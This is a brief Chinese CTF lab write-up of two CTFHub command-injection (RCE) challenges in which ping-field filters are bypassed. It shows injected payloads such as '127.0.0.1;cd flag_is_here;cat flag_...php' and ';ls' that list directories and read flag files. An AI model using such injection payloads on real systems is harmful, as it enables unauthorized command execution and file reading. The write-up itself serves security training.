ctfhub技能树—RCE—过滤目录分隔符，过滤运算符 - 润新知

ctfhub技能树—RCE—过滤目录分隔符，过滤运算符
过滤目录分隔符

打开靶机

查看页面信息

查询当前目录下文件结构

进入flag_is_here目录
```
127.0.0.1;cd flag_is_here
127.0.0.1||ls
```
执行之后发现还是在当前目录

使用如下命令进行查询
```
127.0.0.1;cd flag_is_here;ls
```
查看文件信息
```
127.0.0.1;cd flag_is_here;cat flag_1633660217512.php
```
成功拿到flag

过滤运算符

查看文件结构
```
;ls
```
查看文件信息
```
;cat flag_46031110028241.php
```
成功拿到flag
相关阅读:
Hubble.net 值得纪念的一天
 Hubble.net 0.5 版本开发完成
 计算任意数值的阶乘
 Hubble.net 建表语句 Create Table
Linq to SQL 插入数据时的一个问题
 盘古分词中文人名识别算法介绍
 盘古分词功能简介
 最长不完全匹配子串频率计算eaglet 的解法
 背包分组问题的解法
 SharePoint 2010与2007的区别配置基于表单的身份认证
原文地址：https://www.cnblogs.com/anweilx/p/12512470.html

Copyright © 2020-2023 润新知